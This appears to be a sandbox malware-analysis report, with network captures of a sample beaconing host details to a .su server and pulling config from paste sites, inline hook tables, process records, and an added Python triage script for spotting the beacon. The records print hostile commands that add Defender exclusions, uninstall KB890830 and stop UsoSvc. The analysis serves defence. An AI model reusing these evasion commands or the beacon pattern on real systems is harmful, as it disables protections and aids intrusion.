                                                        2 | 192.168.2.6 | 49740 | 83.168.108.45 | 443 | 2248 | C:\Windows\System32\dialer.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-10-10 02:56:10 UTC | 107 | OUT | GET /f86v1 HTTP/1.1
                                                        Accept: */*
                                                        Connection: close
                                                        Host: justpaste.it
                                                        User-Agent: cpp-httplib/0.12.6
                                                        2024-10-10 02:56:11 UTC | 1007 | IN | HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 10 Oct 2024 02:56:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: max-age=0, must-revalidate, private
                                                        Accept-CH: sec-ch-ua, sec-ch-ua-bitness, sec-ch-ua-arch, sec-ch-ua-platform, sec-ch-ua-platform-version, sec-ch-ua-form-factors, sec-ch-ua-full-version-list, sec-ch-ua-mobile, sec-ch-ua-model
                                                        pragma: no-cache
                                                        Expires: Thu, 10 Oct 2024 02:56:11 GMT
                                                        Set-Cookie: userData=RTrbz8p0ij_E0N6CsdH8m3Ye310kyYUg3aYq489yt8ZOcaH0bYfSXFm6V64WYIBYbL6t3VCWkM0CoyLf72_hB4ezsiJL8_gGR7JRNW9N-oVJHyjta26GIwn4qztDcAt40M71HDc51g4aVniFTshyqCHVDLahWH5D8Fm3BN1H1Gc0EJKlvzxpqGL5rSqGfAmAGj7SRiKurw%3D%3D; expires=Wed, 10 Oct 2029 02:56:11 GMT; Max-Age=157766400; path=/; domain=.justpaste.it; secure; httponly; samesite=lax
                                                        X-Frame-Options: DENY
                                                        X-Content-Type-Options: nosniff
                                                        Referrer-Policy: origin-when-cross-origin
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        2024-10-10 02:56:11 UTC15377INData Raw: 36 64 30 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 68 2d 31 30 30 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67
                                                        Data Ascii: 6d09<!doctype html><html lang="en" class="h-100"><head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="content-languag
                                                        2024-10-10 02:56:11 UTC12549INData Raw: 64 6a 45 67 61 43 30 78 57 69 42 4e 4d 79 41 79 4f 43 42 6f 4d 53 42 32 4d 53 42 6f 4c 54 46 61 49 45 30 30 49 44 49 34 49 47 67 78 49 48 59 78 49 47 67 74 4d 56 6f 67 54 54 55 67 4d 6a 67 67 61 44 45 67 64 6a 45 67 61 43 30 78 57 69 42 4e 4e 69 41 79 4f 43 42 6f 4d 53 42 32 4d 53 42 6f 4c 54 46 61 49 45 30 33 49 44 49 34 49 47 67 78 49 48 59 78 49 47 67 74 4d 56 6f 67 54 54 67 67 4d 6a 67 67 61 44 45 67 64 6a 45 67 61 43 30 78 57 69 42 4e 4f 53 41 79 4f 43 42 6f 4d 53 42 32 4d 53 42 6f 4c 54 46 61 49 45 30 78 4d 43 41 79 4f 43 42 6f 4d 53 42 32 4d 53 42 6f 4c 54 46 61 49 45 30 78 4d 53 41 79 4f 43 42 6f 4d 53 42 32 4d 53 42 6f 4c 54 46 61 49 45 30 78 4d 69 41 79 4f 43 42 6f 4d 53 42 32 4d 53 42 6f 4c 54 46 61 43 6b 30 78 4d 79 41 79 4f 43 42 6f 4d 53 42
                                                        Data Ascii: djEgaC0xWiBNMyAyOCBoMSB2MSBoLTFaIE00IDI4IGgxIHYxIGgtMVogTTUgMjggaDEgdjEgaC0xWiBNNiAyOCBoMSB2MSBoLTFaIE03IDI4IGgxIHYxIGgtMVogTTggMjggaDEgdjEgaC0xWiBNOSAyOCBoMSB2MSBoLTFaIE0xMCAyOCBoMSB2MSBoLTFaIE0xMSAyOCBoMSB2MSBoLTFaIE0xMiAyOCBoMSB2MSBoLTFaCk0xMyAyOCBoMSB


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        3 | 192.168.2.6 | 49754 | 172.67.19.24 | 443 | 2248 | C:\Windows\System32\dialer.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-10-10 02:56:12 UTC | 114 | OUT | GET /raw/sFxN07Y7 HTTP/1.1
                                                        Accept: */*
                                                        Connection: close
                                                        Host: pastebin.com
                                                        User-Agent: cpp-httplib/0.12.6
                                                        2024-10-10 02:56:12 UTC | 388 | IN | HTTP/1.1 200 OK
                                                        Date: Thu, 10 Oct 2024 02:56:12 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        x-frame-options: DENY
                                                        x-content-type-options: nosniff
                                                        x-xss-protection: 1;mode=block
                                                        cache-control: public, max-age=1801
                                                        CF-Cache-Status: MISS
                                                        Last-Modified: Thu, 10 Oct 2024 02:56:12 GMT
                                                        Server: cloudflare
                                                        CF-RAY: 8d0355fd5d7019df-EWR
                                                        2024-10-10 02:56:12 UTC | 15 | IN | Data Raw: 61 0d 0a 72 65 62 6f 72 6e 20 78 6d 72 0d 0a
                                                        Data Ascii: areborn xmr
                                                        2024-10-10 02:56:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        4 | 192.168.2.6 | 49760 | 188.114.97.3 | 443 | 2248 | C:\Windows\System32\dialer.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-10-10 02:56:13 UTC | 212 | OUT | POST /api/endpoint.php HTTP/1.1
                                                        Accept: */*
                                                        Connection: close
                                                        Content-Length: 374
                                                        Content-Type: application/json
                                                        Host: jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su
                                                        User-Agent: cpp-httplib/0.12.6
                                                        2024-10-10 02:56:13 UTC374OUTData Raw: 7b 22 69 64 22 3a 22 61 79 6d 68 64 61 6b 71 79 74 76 63 65 69 77 76 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 37 34 35 37 37 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 5a 38 42 50 53 45 33 4f 48 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 35 61 70 66 39 38 6f 73 2f 72 61 77 2c 68 74 74 70 73 3a 2f 2f 6a 75 73 74 70 61 73 74 65 2e 69 74 2f 66 38 36 76 31 2c 68 74 74 70 73 3a 2f
                                                        Data Ascii: {"id":"aymhdakqytvceiwv","computername":"745773","username":"SYSTEM","gpu":"Z8BPSE3OH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://rentry.co/5apf98os/raw,https://justpaste.it/f86v1,https:/
                                                        2024-10-10 02:56:13 UTC | 626 | IN | HTTP/1.1 405 Not Allowed
                                                        Date: Thu, 10 Oct 2024 02:56:13 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iwXhoj%2Bke1XFqXFELImOO7%2F30n%2BgQoHEXqFV%2BewEuKQ5lYpNYYL%2F7eu7qcdx6R4ttK%2Fr2NOKntkJ1jSQi0V%2F3eL7LN30E%2B9WlZ2USFiOVhKB%2F8lKYRDFO6IzoAvM7THaCaXuUnN7RU3cl65cKPZ52ajbENh2Xbi2AyJiVtD3Jr3A4AZQMKkz"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8d03560489730f65-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-10-10 02:56:13 UTC163INData Raw: 39 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                        Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>
                                                        2024-10-10 02:56:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        5 | 192.168.2.6 | 65331 | 188.114.97.3 | 443 | 2248 | C:\Windows\System32\dialer.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-10-10 02:57:07 UTC | 212 | OUT | POST /api/endpoint.php HTTP/1.1
                                                        Accept: */*
                                                        Connection: close
                                                        Content-Length: 595
                                                        Content-Type: application/json
                                                        Host: jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su
                                                        User-Agent: cpp-httplib/0.12.6
                                                        2024-10-10 02:57:07 UTC595OUTData Raw: 7b 22 69 64 22 3a 22 61 79 6d 68 64 61 6b 71 79 74 76 63 65 69 77 76 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 37 34 35 37 37 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 5a 38 42 50 53 45 33 4f 48 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 35 61 70 66 39 38 6f 73 2f 72 61 77 2c 68 74 74 70 73 3a 2f 2f 6a 75 73 74 70 61 73 74 65 2e 69 74 2f 66 38 36 76 31 2c 68 74 74 70 73 3a 2f
                                                        Data Ascii: {"id":"aymhdakqytvceiwv","computername":"745773","username":"SYSTEM","gpu":"Z8BPSE3OH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://rentry.co/5apf98os/raw,https://justpaste.it/f86v1,https:/
                                                        2024-10-10 02:57:08 UTC | 624 | IN | HTTP/1.1 405 Not Allowed
                                                        Date: Thu, 10 Oct 2024 02:57:08 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VZvUmHtEtanfA3fmmeqr5Yjgaq4acZ1vBplSwP%2FoxwaEJbtvcRMaAbgMonrfwOEAOGBjDWSbWOy0%2BwgFZKSjsp1W%2BmWhdNr%2BQji7jBtv3o%2Fgwu6VxGywegWw%2F5XUEObjjCq2Hjar5npj56895jeyU%2FUB%2FqcVi2txUNAzAjSO0sfCJJ0QjwzS"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8d03575968d44390-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-10-10 02:57:08 UTC163INData Raw: 39 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                        Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>
                                                        2024-10-10 02:57:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                        6 | 192.168.2.6 | 65333 | 188.114.97.3 | 443
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-10-10 02:58:14 UTC | 212 | OUT | POST /api/endpoint.php HTTP/1.1
                                                        Accept: */*
                                                        Connection: close
                                                        Content-Length: 582
                                                        Content-Type: application/json
                                                        Host: jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su
                                                        User-Agent: cpp-httplib/0.12.6
                                                        2024-10-10 02:58:14 UTC582OUTData Raw: 7b 22 69 64 22 3a 22 61 79 6d 68 64 61 6b 71 79 74 76 63 65 69 77 76 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 37 34 35 37 37 33 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 59 53 54 45 4d 22 2c 22 67 70 75 22 3a 22 5a 38 42 50 53 45 33 4f 48 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 35 61 70 66 39 38 6f 73 2f 72 61 77 2c 68 74 74 70 73 3a 2f 2f 6a 75 73 74 70 61 73 74 65 2e 69 74 2f 66 38 36 76 31 2c 68 74 74 70 73 3a 2f
                                                        Data Ascii: {"id":"aymhdakqytvceiwv","computername":"745773","username":"SYSTEM","gpu":"Z8BPSE3OH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://rentry.co/5apf98os/raw,https://justpaste.it/f86v1,https:/
                                                        2024-10-10 02:58:14 UTC | 614 | IN | HTTP/1.1 405 Not Allowed
                                                        Date: Thu, 10 Oct 2024 02:58:14 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c1S7GJRSQ5DQRD7mcfSrKY6SGLG8fqygXvbaAtbEerkbfVplfd2%2BBWQSndHWxprFx4hS8F9PYhKiu43jgbVRMnM1dLr5uVGs62rKYeA0jveLA0TmIEiEqLBndsEby1zuuvf%2BHKcBbm1QvcClMOhRCW3xPnlNTqBltkirUc9l7YsqmeTLtCB%2F"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8d0358f7de1443e9-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-10-10 02:58:14 UTC163INData Raw: 39 64 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                        Data Ascii: 9d<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>
                                                        2024-10-10 02:58:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0
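All six HTTP sessions above share the same shape: a system binary that has no reason to speak HTTP (dialer.exe, which the sample injected into) uses an embedded cpp-httplib client to pull short strings from three paste services named in the beacon's "remoteconfig" field, then POSTs host telemetry (id, computername, username, GPU, CPU) to a long random-looking .su hostname, which answers 405. Note that the pastebin "Data Ascii" row reads "areborn xmr" only because the body is chunked: "a" is the hex chunk size, the payload is "reborn xmr". The triage below is an added example, not part of the report: it reassembles chunked bodies and applies those four traits to the captured exchanges. The session records are reconstructed from the rows above (the justpaste.it HTML and the 405 HTML bodies are left out), the firefox.exe record is a made-up benign control, and the choice of dialer.exe as a "never expected to do HTTP" binary and the 32-character label threshold are assumptions of this example.

```python
"""Triage of the captured HTTP sessions (added example): chunked-body decoding plus four
traits of the dialer.exe beacon."""
from dataclasses import dataclass


@dataclass
class Exchange:
    process: str        # image path of the process that sent the request
    host: str           # Host header
    request_line: str   # "METHOD /path HTTP/1.1"
    user_agent: str
    body_hex: str       # response body as it appears in the "Data Raw" rows
    chunked: bool       # response carried Transfer-Encoding: chunked


# Constructed from the capture; the firefox.exe line is a made-up benign control.
SESSIONS = [
    Exchange(r"C:\Windows\System32\dialer.exe", "rentry.co", "GET /5apf98os/raw HTTP/1.1",
             "cpp-httplib/0.12.6", "52 45 42 4f 52 4e 20 58 4d 52", False),
    Exchange(r"C:\Windows\System32\dialer.exe", "pastebin.com", "GET /raw/sFxN07Y7 HTTP/1.1",
             "cpp-httplib/0.12.6", "61 0d 0a 72 65 62 6f 72 6e 20 78 6d 72 0d 0a 30 0d 0a 0d 0a", True),
    Exchange(r"C:\Windows\System32\dialer.exe", "jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su",
             "POST /api/endpoint.php HTTP/1.1", "cpp-httplib/0.12.6", "", True),   # 405 body omitted
    Exchange(r"C:\Program Files\Mozilla Firefox\firefox.exe", "example.com", "GET / HTTP/1.1",
             "Mozilla/5.0", "", False),
]

PASTE_HOSTS = {"rentry.co", "justpaste.it", "pastebin.com"}   # the three hosts in the beacon's remoteconfig
NO_HTTP_EXPECTED = {"dialer.exe"}                              # assumption: binaries that never talk HTTP
LONG_LABEL = 32                                                # assumption: first DNS label this long is suspect


def decode_chunked(raw: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body: <hex size>CRLF<data>CRLF ... 0CRLFCRLF."""
    out, pos = bytearray(), 0
    while raw:
        end = raw.index(b"\r\n", pos)
        size = int(raw[pos:end].split(b";")[0], 16)   # chunk extensions after ';' are ignored
        pos = end + 2
        if size == 0:
            break
        out += raw[pos:pos + size]
        pos += size + 2                                # step over the chunk's trailing CRLF
    return bytes(out)


def triage(ex: Exchange) -> dict:
    """Decode the body and list which of the four beacon traits this exchange shows."""
    exe = ex.process.rsplit("\\", 1)[-1].lower()
    method, path, _ = ex.request_line.split(" ", 2)
    raw = bytes.fromhex(ex.body_hex)
    body = (decode_chunked(raw) if ex.chunked else raw).decode("latin-1").strip()

    findings = []
    if exe in NO_HTTP_EXPECTED:
        findings.append("proc_no_http")          # injected host process doing web requests
    if ex.user_agent.lower().startswith("cpp-httplib/"):
        findings.append("cpp_httplib_ua")        # statically linked client library, not a browser
    if ex.host.lower() in PASTE_HOSTS:
        findings.append("paste_site_config")     # remote configuration pulled from a paste service
    if len(ex.host.split(".")[0]) >= LONG_LABEL:
        findings.append("long_random_host")      # beacon endpoint on a throwaway hostname
    return {"process": exe, "host": ex.host, "method": method, "path": path,
            "body": body, "findings": findings}


if __name__ == "__main__":
    for ex in SESSIONS:
        r = triage(ex)
        print(f'{r["process"]:12} {r["method"]:4} {r["host"]:55} body={r["body"]!r:14} {r["findings"]}')
```

In the capture the paste responses are the same ten-character string in two spellings ("REBORN XMR", "reborn xmr"); the report does not say how the client interprets it, so the triage only surfaces the body and leaves the meaning to the analyst.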


                                                        Code Manipulations

                                                        Function Name | Hook Type | Active in Processes
                                                        ZwEnumerateKey | INLINE | winlogon.exe, explorer.exe
                                                        NtQuerySystemInformation | INLINE | winlogon.exe, explorer.exe
                                                        ZwResumeThread | INLINE | winlogon.exe, explorer.exe
                                                        NtDeviceIoControlFile | INLINE | winlogon.exe, explorer.exe
                                                        ZwDeviceIoControlFile | INLINE | winlogon.exe, explorer.exe
                                                        NtEnumerateKey | INLINE | winlogon.exe, explorer.exe
                                                        NtQueryDirectoryFile | INLINE | winlogon.exe, explorer.exe
                                                        ZwEnumerateValueKey | INLINE | winlogon.exe, explorer.exe
                                                        ZwQuerySystemInformation | INLINE | winlogon.exe, explorer.exe
                                                        NtResumeThread | INLINE | winlogon.exe, explorer.exe
                                                        RtlGetNativeSystemInformation | INLINE | winlogon.exe, explorer.exe
                                                        NtQueryDirectoryFileEx | INLINE | winlogon.exe, explorer.exe
                                                        NtEnumerateValueKey | INLINE | winlogon.exe, explorer.exe
                                                        ZwQueryDirectoryFileEx | INLINE | winlogon.exe, explorer.exe
                                                        ZwQueryDirectoryFile | INLINE | winlogon.exe, explorer.exe

                                                        Function Name | Hook Type | New Data
                                                        ZwEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                        NtQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        ZwResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                        NtDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
                                                        ZwDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
                                                        NtEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                        NtQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                        ZwEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
                                                        ZwQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        NtResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                        RtlGetNativeSystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        NtQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                        NtEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
                                                        ZwQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                        ZwQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                        Function Name | Hook Type | New Data
                                                        ZwEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                        NtQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        ZwResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                        NtDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
                                                        ZwDeviceIoControlFile | INLINE | 0xE9 0x90 0x03 0x33 0x34 0x4F
                                                        NtEnumerateKey | INLINE | 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                        NtQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                        ZwEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
                                                        ZwQuerySystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        NtResumeThread | INLINE | 0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                        RtlGetNativeSystemInformation | INLINE | 0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                        NtQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                        NtEnumerateValueKey | INLINE | 0xE9 0x90 0x03 0x33 0x31 0x1F
                                                        ZwQueryDirectoryFileEx | INLINE | 0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                        ZwQueryDirectoryFile | INLINE | 0xE9 0x9A 0xA3 0x32 0x2B 0xBF


                                                        Target ID:0
                                                        Start time:22:55:57
                                                        Start date:09/10/2024
                                                        Path:C:\Users\user\Desktop\egFMhHSlmf.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Users\user\Desktop\egFMhHSlmf.exe"
                                                        Imagebase:0x7ff687bc0000
                                                        File size:5'536'856 bytes
                                                        MD5 hash:1417D38C40D85D1C4EB7FAD3444CA069
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:22:55:57
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                        Imagebase:0x7ff6e3d50000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:22:55:57
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff66e660000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                        Imagebase:0x7ff70b4f0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:22:56:01
                                                        Start date:09/10/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                        Imagebase:0x7ff6db4c0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
